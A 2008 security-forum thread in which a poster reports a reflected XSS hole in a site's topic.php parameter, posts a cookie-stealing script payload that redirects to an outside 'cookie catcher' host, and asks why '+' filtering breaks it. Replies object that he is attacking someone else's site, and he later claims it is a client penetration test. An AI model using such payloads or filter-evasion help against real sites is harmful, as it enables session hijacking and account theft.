Stiofan Posted April 20, 2008 Posted April 20, 2008 Hi All, I have a problem with a site that seems vulnerable to XSS! [tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt] The above will display the details of the login cookie. However, I can’t get the following to work: This however: [tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt] Won't work! I’ve tried converting it to HEX etc. Nothing seems to work. Am I doing something wrong are there security features in modern browsers that prevent this? When I view the HTML source however, I notice something interesting: [tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt] It would appear to have filtered out the plus (+) symbol? When I type the URL: [tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt] into my browser and hit go, I get a javascript error. It says that it says it expected a semicolon. I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem. Is there anything else I can do. Thanks, S. Quote
Deveant Posted April 20, 2008 Posted April 20, 2008 its possible it filtered a number of things, but either way, you started this topic the wrong way, you said that your attacking someone else's website, this is a no no. So simply i will say, that the site you are attacking, inst so vulnerable after all. Quite easily the web host may be filtering out "http://www.mycookiecatcher.com" in the address. This is easily done. I suggest a new method of attack. I have a problem with a site that seems vulnerable to XSS! There are hundreds upon thousands of sites vulnerable to an XSS attack, just gotta know how to find em, and what styles of XSS attacks you can do. Quote
K1u Posted April 20, 2008 Posted April 20, 2008 Here bro - http://www.criticalsecurity.net/index.php?showtopic=7137 enjoy. Quote
moonlit Posted April 20, 2008 Posted April 20, 2008 I'd rhetorically question why I bother, but I'm not sure that'd be particularly productive. I'll just sigh instead. Quote
Stiofan Posted April 24, 2008 Author Posted April 24, 2008 Apologies, I probably should've added that I'm penetration testing for a client Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.